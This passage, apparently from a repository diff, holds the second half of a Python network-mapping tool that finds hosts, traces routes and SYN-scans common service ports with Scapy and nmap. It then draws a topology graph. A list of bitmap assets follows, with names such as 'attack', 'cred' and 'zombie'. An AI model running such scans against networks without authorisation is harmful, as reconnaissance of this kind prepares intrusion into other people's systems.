logging.info(f"Discovered host: {ip} ({mac})")
|
||||
|
||||
# Additional Nmap scan for service discovery
|
||||
nm = nmap.PortScanner()
|
||||
nm.scan(hosts=self.network_range, arguments=f'-sn -T4')
|
||||
|
||||
for host in nm.all_hosts():
|
||||
if host not in self.hosts:
|
||||
self.hosts[host] = {'status': 'up'}
|
||||
logging.info(f"Discovered host: {host}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error discovering hosts: {e}")
|
||||
|
||||
def trace_route(self, target):
|
||||
"""Perform traceroute to a target."""
|
||||
try:
|
||||
hops = []
|
||||
for ttl in range(1, self.max_depth + 1):
|
||||
pkt = IP(dst=target, ttl=ttl)/ICMP()
|
||||
reply = scapy.sr1(pkt, timeout=self.timeout, verbose=False)
|
||||
|
||||
if reply is None:
|
||||
continue
|
||||
|
||||
if reply.src == target:
|
||||
hops.append(reply.src)
|
||||
break
|
||||
|
||||
hops.append(reply.src)
|
||||
|
||||
return hops
|
||||
except Exception as e:
|
||||
logging.error(f"Error tracing route to {target}: {e}")
|
||||
return []
|
||||
|
||||
def scan_ports(self, ip):
|
||||
"""Scan common ports on a host."""
|
||||
try:
|
||||
common_ports = [21, 22, 23, 25, 53, 80, 443, 445, 3389]
|
||||
open_ports = []
|
||||
|
||||
for port in common_ports:
|
||||
tcp_connect = IP(dst=ip)/TCP(dport=port, flags="S")
|
||||
response = scapy.sr1(tcp_connect, timeout=self.timeout, verbose=False)
|
||||
|
||||
if response and response.haslayer(TCP):
|
||||
if response[TCP].flags == 0x12: # SYN-ACK
|
||||
open_ports.append(port)
|
||||
# Send RST to close connection
|
||||
rst = IP(dst=ip)/TCP(dport=port, flags="R")
|
||||
scapy.send(rst, verbose=False)
|
||||
|
||||
return open_ports
|
||||
except Exception as e:
|
||||
logging.error(f"Error scanning ports for {ip}: {e}")
|
||||
return []
|
||||
|
||||
def worker(self):
|
||||
"""Worker function for parallel processing."""
|
||||
while True:
|
||||
try:
|
||||
task = self.queue.get()
|
||||
if task is None:
|
||||
break
|
||||
|
||||
ip = task
|
||||
hops = self.trace_route(ip)
|
||||
ports = self.scan_ports(ip)
|
||||
|
||||
self.results.queue.put({
|
||||
'ip': ip,
|
||||
'hops': hops,
|
||||
'ports': ports
|
||||
})
|
||||
|
||||
self.queue.task_done()
|
||||
except Exception as e:
|
||||
logging.error(f"Worker error: {e}")
|
||||
self.queue.task_done()
|
||||
|
||||
def build_topology(self):
|
||||
"""Build network topology by tracing routes and scanning hosts."""
|
||||
try:
|
||||
# Start worker threads
|
||||
workers = []
|
||||
for _ in range(5): # Number of parallel workers
|
||||
t = threading.Thread(target=self.worker)
|
||||
t.start()
|
||||
workers.append(t)
|
||||
|
||||
# Add tasks to queue
|
||||
for ip in self.hosts.keys():
|
||||
self.queue.put(ip)
|
||||
|
||||
# Add None to queue to stop workers
|
||||
for _ in workers:
|
||||
self.queue.put(None)
|
||||
|
||||
# Wait for all workers to complete
|
||||
for t in workers:
|
||||
t.join()
|
||||
|
||||
# Process results
|
||||
while not self.results.empty():
|
||||
result = self.results.get()
|
||||
ip = result['ip']
|
||||
hops = result['hops']
|
||||
ports = result['ports']
|
||||
|
||||
self.hosts[ip]['ports'] = ports
|
||||
if len(hops) > 1:
|
||||
self.routes[ip] = hops
|
||||
|
||||
# Add nodes and edges to graph
|
||||
self.graph.add_node(ip, **self.hosts[ip])
|
||||
for i in range(len(hops) - 1):
|
||||
self.graph.add_edge(hops[i], hops[i + 1])
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error building topology: {e}")
|
||||
|
||||
def generate_visualization(self):
|
||||
"""Generate network topology visualization."""
|
||||
try:
|
||||
plt.figure(figsize=(12, 8))
|
||||
|
||||
# Position nodes using spring layout
|
||||
pos = nx.spring_layout(self.graph)
|
||||
|
||||
# Draw nodes
|
||||
nx.draw_networkx_nodes(self.graph, pos, node_size=500)
|
||||
|
||||
# Draw edges
|
||||
nx.draw_networkx_edges(self.graph, pos)
|
||||
|
||||
# Add labels
|
||||
labels = {}
|
||||
for node in self.graph.nodes():
|
||||
label = f"{node}\n"
|
||||
if 'ports' in self.hosts[node]:
|
||||
label += f"Ports: {', '.join(map(str, self.hosts[node]['ports']))}"
|
||||
labels[node] = label
|
||||
|
||||
nx.draw_networkx_labels(self.graph, pos, labels, font_size=8)
|
||||
|
||||
# Save visualization
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
viz_path = os.path.join(self.output_dir, f"topology_{timestamp}.png")
|
||||
plt.savefig(viz_path)
|
||||
plt.close()
|
||||
|
||||
logging.info(f"Visualization saved to {viz_path}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error generating visualization: {e}")
|
||||
|
||||
def save_results(self):
|
||||
"""Save topology data to JSON file."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
|
||||
results = {
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'network_range': self.network_range,
|
||||
'hosts': self.hosts,
|
||||
'routes': self.routes,
|
||||
'topology': {
|
||||
'nodes': list(self.graph.nodes()),
|
||||
'edges': list(self.graph.edges())
|
||||
}
|
||||
}
|
||||
|
||||
output_file = os.path.join(self.output_dir, f"topology_{timestamp}.json")
|
||||
with open(output_file, 'w') as f:
|
||||
json.dump(results, f, indent=4)
|
||||
|
||||
logging.info(f"Results saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Execute the network mapping process."""
|
||||
try:
|
||||
logging.info(f"Starting network mapping of {self.network_range}")
|
||||
|
||||
# Discovery phase
|
||||
self.discover_hosts()
|
||||
if not self.hosts:
|
||||
logging.error("No hosts discovered")
|
||||
return
|
||||
|
||||
# Topology building phase
|
||||
self.build_topology()
|
||||
|
||||
# Generate outputs
|
||||
self.generate_visualization()
|
||||
self.save_results()
|
||||
|
||||
logging.info("Network mapping completed")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error during execution: {e}")
|
||||
|
||||
def save_settings(network_range, interface, max_depth, output_dir, timeout):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"network_range": network_range,
|
||||
"interface": interface,
|
||||
"max_depth": max_depth,
|
||||
"output_dir": output_dir,
|
||||
"timeout": timeout
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Network topology mapping tool")
|
||||
parser.add_argument("-r", "--range", help="Network range to scan (CIDR)")
|
||||
parser.add_argument("-i", "--interface", help="Network interface to use")
|
||||
parser.add_argument("-d", "--depth", type=int, default=5, help="Maximum trace depth")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
parser.add_argument("-t", "--timeout", type=int, default=2, help="Timeout for probes")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
network_range = args.range or settings.get("network_range")
|
||||
interface = args.interface or settings.get("interface")
|
||||
max_depth = args.depth or settings.get("max_depth")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
timeout = args.timeout or settings.get("timeout")
|
||||
|
||||
if not network_range:
|
||||
logging.error("Network range is required. Use -r or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(network_range, interface, max_depth, output_dir, timeout)
|
||||
|
||||
mapper = YggdrasilMapper(
|
||||
network_range=network_range,
|
||||
interface=interface,
|
||||
max_depth=max_depth,
|
||||
output_dir=output_dir,
|
||||
timeout=timeout
|
||||
)
|
||||
mapper.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
BIN
resources/default_config/characters/ALVA/static/0.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/100.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/25.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/50.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/75.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/AI.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/attack.bmp
Normal file
|
After Width: | Height: | Size: 158 B |
BIN
resources/default_config/characters/ALVA/static/attacks.bmp
Normal file
|
After Width: | Height: | Size: 134 B |
BIN
resources/default_config/characters/ALVA/static/auto.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/bjorn1.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/static/bluetooth.bmp
Normal file
|
After Width: | Height: | Size: 446 B |
BIN
resources/default_config/characters/ALVA/static/charging.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/charging1.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/connected.bmp
Normal file
|
After Width: | Height: | Size: 670 B |
BIN
resources/default_config/characters/ALVA/static/cred.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/data.bmp
Normal file
|
After Width: | Height: | Size: 938 B |
BIN
resources/default_config/characters/ALVA/static/ethernet.bmp
Normal file
|
After Width: | Height: | Size: 670 B |
BIN
resources/default_config/characters/ALVA/static/frise.bmp
Normal file
|
After Width: | Height: | Size: 4.0 KiB |
BIN
resources/default_config/characters/ALVA/static/gold.bmp
Normal file
|
After Width: | Height: | Size: 1.4 KiB |
BIN
resources/default_config/characters/ALVA/static/level.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/manual.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/money.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/networkkb.bmp
Normal file
|
After Width: | Height: | Size: 134 B |
BIN
resources/default_config/characters/ALVA/static/port.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/target.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/usb.bmp
Normal file
|
After Width: | Height: | Size: 670 B |
BIN
resources/default_config/characters/ALVA/static/vuln.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/wifi.bmp
Normal file
|
After Width: | Height: | Size: 950 B |
BIN
resources/default_config/characters/ALVA/static/zombie.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
|
After Width: | Height: | Size: 29 KiB |
|
Before Width: | Height: | Size: 2.3 KiB After Width: | Height: | Size: 2.3 KiB |
|
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE.bmp
Normal file
|
After Width: | Height: | Size: 174 B |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE1.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE2.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE3.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE4.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
|
After Width: | Height: | Size: 2.3 KiB |
|
After Width: | Height: | Size: 18 KiB |
|
After Width: | Height: | Size: 18 KiB |